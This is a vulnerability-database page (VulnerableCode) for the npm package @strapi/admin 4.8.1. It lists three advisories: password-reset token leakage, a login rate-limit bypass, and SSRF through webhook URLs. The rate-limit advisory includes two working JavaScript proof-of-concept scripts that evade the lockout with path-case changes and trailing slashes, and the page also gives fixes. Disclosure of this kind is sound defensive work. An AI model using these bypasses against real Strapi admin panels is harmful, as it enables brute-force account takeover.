VulnerableCode Package Details - pkg:npm/%40strapi/admin@4.8.1

Search for packages

Vulnerability	Summary	Fixed by
VCID-adab-ztym-ayhd Aliases: CVE-2023-36472 GHSA-v8gg-4mq2-88q4	Strapi may leak sensitive user information, user reset password, tokens via content-manager views Attackers can get access to user reset password tokens if they have the configure view permissions.	4.11.7 Affected by 2 other vulnerabilities. This version is affected by these other vulnerabilities: {{ fixed_by_vuln.vulnerability_id }} {{ fixed_by_vuln.vulnerability_id }}
VCID-byez-u4kv-7qac Aliases: CVE-2023-38507 GHSA-24q2-59hm-rh9r	Strapi Improper Rate Limiting vulnerability ### 1. Summary There is a rate limit on the login function of Strapi's admin screen, but it is possible to circumvent it. ### 2. Details It is possible to avoid this by modifying the rate-limited request path as follows. 1. Manipulating request paths to upper or lower case. (Pattern 1) - In this case, avoidance is possible with various patterns. 2. Add path slashes to the end of the request path. (Pattern 2) ### 3. PoC Access the administrator's login screen (`/admin/auth/login`) and execute the following PoC on the browser's console screen. #### Pattern 1 (uppercase and lowercase) ```js // poc.js (async () => { const data1 = { email: "admin@strapi.com", // registered e-mail address password: "invalid_password", }; const data2 = { email: "admin@strapi.com", password: "RyG5z-CE2-]4e4", // correct password }; for (let i = 0; i < 30; i++) { await fetch("http://localhost:1337/admin/login", { method: "POST", body: JSON.stringify(data1), headers: { "Content-Type": "application/json", }, }); } const res1 = await fetch("http://localhost:1337/admin/login", { method: "POST", body: JSON.stringify(data2), headers: { "Content-Type": "application/json", }, }); console.log(res1.status + " " + res1.statusText); const res2 = await fetch("http://localhost:1337/admin/Login", { // capitalize part of path method: "POST", body: JSON.stringify(data2), headers: { "Content-Type": "application/json", }, }); console.log(res2.status + " " + res2.statusText); })(); ``` ##### This PoC does the following: 1. Request 30 incorrect logins. 4. Execute the same request again and confirm that it is blocked by rate limit from the console screen. (`429 Too Many Requests`) 5. Next, falsify the pathname of the request (`/admin/Login`) and make a request again to confirm that it is possible to bypass the rate limit and log in. (`200 OK`) #### Pattern 2 (trailing slash) ```js // poc.js (async () => { const data1 = { email: "admin@strapi.com", // registered e-mail address password: "invalid_password", }; const data2 = { email: "admin@strapi.com", password: "RyG5z-CE2-]4e4", // correct password }; for (let i = 0; i < 30; i++) { await fetch("http://localhost:1337/admin/login", { method: "POST", body: JSON.stringify(data1), headers: { "Content-Type": "application/json", }, }); } const res1 = await fetch("http://localhost:1337/admin/login", { method: "POST", body: JSON.stringify(data2), headers: { "Content-Type": "application/json", }, }); console.log(res1.status + " " + res1.statusText); const res2 = await fetch("http://localhost:1337/admin/login/", { // trailing slash method: "POST", body: JSON.stringify(data2), headers: { "Content-Type": "application/json", }, }); console.log(res2.status + " " + res2.statusText); })(); ``` ##### This PoC does the following: 1. Request 30 incorrect logins. 2. Execute the same request again and confirm that it is blocked by rate limit from the console screen. (`429 Too Many Requests`) 3. Next, falsify the pathname of the request (`/admin/login/`) and make a request again to confirm that it is possible to bypass the rate limit and log in. (`200 OK`) ### 4. Impact It is possible to bypass the rate limit of the login function of the admin screen. Therefore, the possibility of unauthorized login by login brute force attack increases. ### 5. Measures Forcibly convert the request path used for rate limiting to upper case or lower case and judge it as the same path. (`ctx.request.path`) Also, remove any extra slashes in the request path.	4.12.1 Affected by 1 other vulnerability. This version is affected by these other vulnerabilities: {{ fixed_by_vuln.vulnerability_id }}
VCID-s8e6-3wdh-k3gz Aliases: CVE-2024-52588 GHSA-v8wj-f5c7-pvxf	Strapi allows Server-Side Request Forgery in Webhook function In Strapi latest version, at function Settings -> Webhooks, the application allows us to input a URL in order to create a Webook connection. However, we can input into this field the local domains such as `localhost`, `127.0.0.1`, `0.0.0.0`,.... in order to make the Application fetching into the internal itself, which causes the vulnerability `Server - Side Request Forgery (SSRF)`.	4.25.2 Affected by 0 other vulnerabilities.

Vulnerability

Summary

Fixed by

VCID-adab-ztym-ayhd
Aliases:
CVE-2023-36472
GHSA-v8gg-4mq2-88q4

Strapi may leak sensitive user information, user reset password, tokens via content-manager views Attackers can get access to user reset password tokens if they have the configure view permissions.

4.11.7
Affected by 2 other vulnerabilities.

VCID-byez-u4kv-7qac
Aliases:
CVE-2023-38507
GHSA-24q2-59hm-rh9r

Strapi Improper Rate Limiting vulnerability ### 1. Summary There is a rate limit on the login function of Strapi's admin screen, but it is possible to circumvent it. ### 2. Details It is possible to avoid this by modifying the rate-limited request path as follows. 1. Manipulating request paths to upper or lower case. (Pattern 1) - In this case, avoidance is possible with various patterns. 2. Add path slashes to the end of the request path. (Pattern 2) ### 3. PoC Access the administrator's login screen (`/admin/auth/login`) and execute the following PoC on the browser's console screen. #### Pattern 1 (uppercase and lowercase) ```js // poc.js (async () => { const data1 = { email: "admin@strapi.com", // registered e-mail address password: "invalid_password", }; const data2 = { email: "admin@strapi.com", password: "RyG5z-CE2-]*4e4", // correct password }; for (let i = 0; i < 30; i++) { await fetch("http://localhost:1337/admin/login", { method: "POST", body: JSON.stringify(data1), headers: { "Content-Type": "application/json", }, }); } const res1 = await fetch("http://localhost:1337/admin/login", { method: "POST", body: JSON.stringify(data2), headers: { "Content-Type": "application/json", }, }); console.log(res1.status + " " + res1.statusText); const res2 = await fetch("http://localhost:1337/admin/Login", { // capitalize part of path method: "POST", body: JSON.stringify(data2), headers: { "Content-Type": "application/json", }, }); console.log(res2.status + " " + res2.statusText); })(); ``` ##### This PoC does the following: 1. Request 30 incorrect logins. 4. Execute the same request again and confirm that it is blocked by rate limit from the console screen. (`429 Too Many Requests`) 5. Next, falsify the pathname of the request (**`/admin/Login`**) and make a request again to confirm that it is possible to bypass the rate limit and log in. (`200 OK`) #### Pattern 2 (trailing slash) ```js // poc.js (async () => { const data1 = { email: "admin@strapi.com", // registered e-mail address password: "invalid_password", }; const data2 = { email: "admin@strapi.com", password: "RyG5z-CE2-]*4e4", // correct password }; for (let i = 0; i < 30; i++) { await fetch("http://localhost:1337/admin/login", { method: "POST", body: JSON.stringify(data1), headers: { "Content-Type": "application/json", }, }); } const res1 = await fetch("http://localhost:1337/admin/login", { method: "POST", body: JSON.stringify(data2), headers: { "Content-Type": "application/json", }, }); console.log(res1.status + " " + res1.statusText); const res2 = await fetch("http://localhost:1337/admin/login/", { // trailing slash method: "POST", body: JSON.stringify(data2), headers: { "Content-Type": "application/json", }, }); console.log(res2.status + " " + res2.statusText); })(); ``` ##### This PoC does the following: 1. Request 30 incorrect logins. 2. Execute the same request again and confirm that it is blocked by rate limit from the console screen. (`429 Too Many Requests`) 3. Next, falsify the pathname of the request (**`/admin/login/`**) and make a request again to confirm that it is possible to bypass the rate limit and log in. (`200 OK`) ### 4. Impact It is possible to bypass the rate limit of the login function of the admin screen. Therefore, the possibility of unauthorized login by login brute force attack increases. ### 5. Measures Forcibly convert the request path used for rate limiting to upper case or lower case and judge it as the same path. (`ctx.request.path`) Also, remove any extra slashes in the request path.

4.12.1
Affected by 1 other vulnerability.

VCID-s8e6-3wdh-k3gz
Aliases:
CVE-2024-52588
GHSA-v8wj-f5c7-pvxf

Strapi allows Server-Side Request Forgery in Webhook function In Strapi latest version, at function Settings -> Webhooks, the application allows us to input a URL in order to create a Webook connection. However, we can input into this field the local domains such as `localhost`, `127.0.0.1`, `0.0.0.0`,.... in order to make the Application fetching into the internal itself, which causes the vulnerability `Server - Side Request Forgery (SSRF)`.

4.25.2
Affected by 0 other vulnerabilities.

Vulnerability	Summary	Aliases
This package is not known to fix vulnerabilities.

Vulnerability

Summary

Aliases

This package is not known to fix vulnerabilities.

Date	Actor	Action	Vulnerability	Source	VulnerableCode Version
2026-06-06T05:50:47.012045+00:00	GitLab Importer	Affected by	VCID-s8e6-3wdh-k3gz	https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/@strapi/admin/CVE-2024-52588.yml	38.6.0
2026-06-06T04:07:18.486157+00:00	GitLab Importer	Affected by	VCID-byez-u4kv-7qac	https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/@strapi/admin/CVE-2023-38507.yml	38.6.0
2026-06-06T04:07:03.443391+00:00	GitLab Importer	Affected by	VCID-adab-ztym-ayhd	https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/@strapi/admin/CVE-2023-36472.yml	38.6.0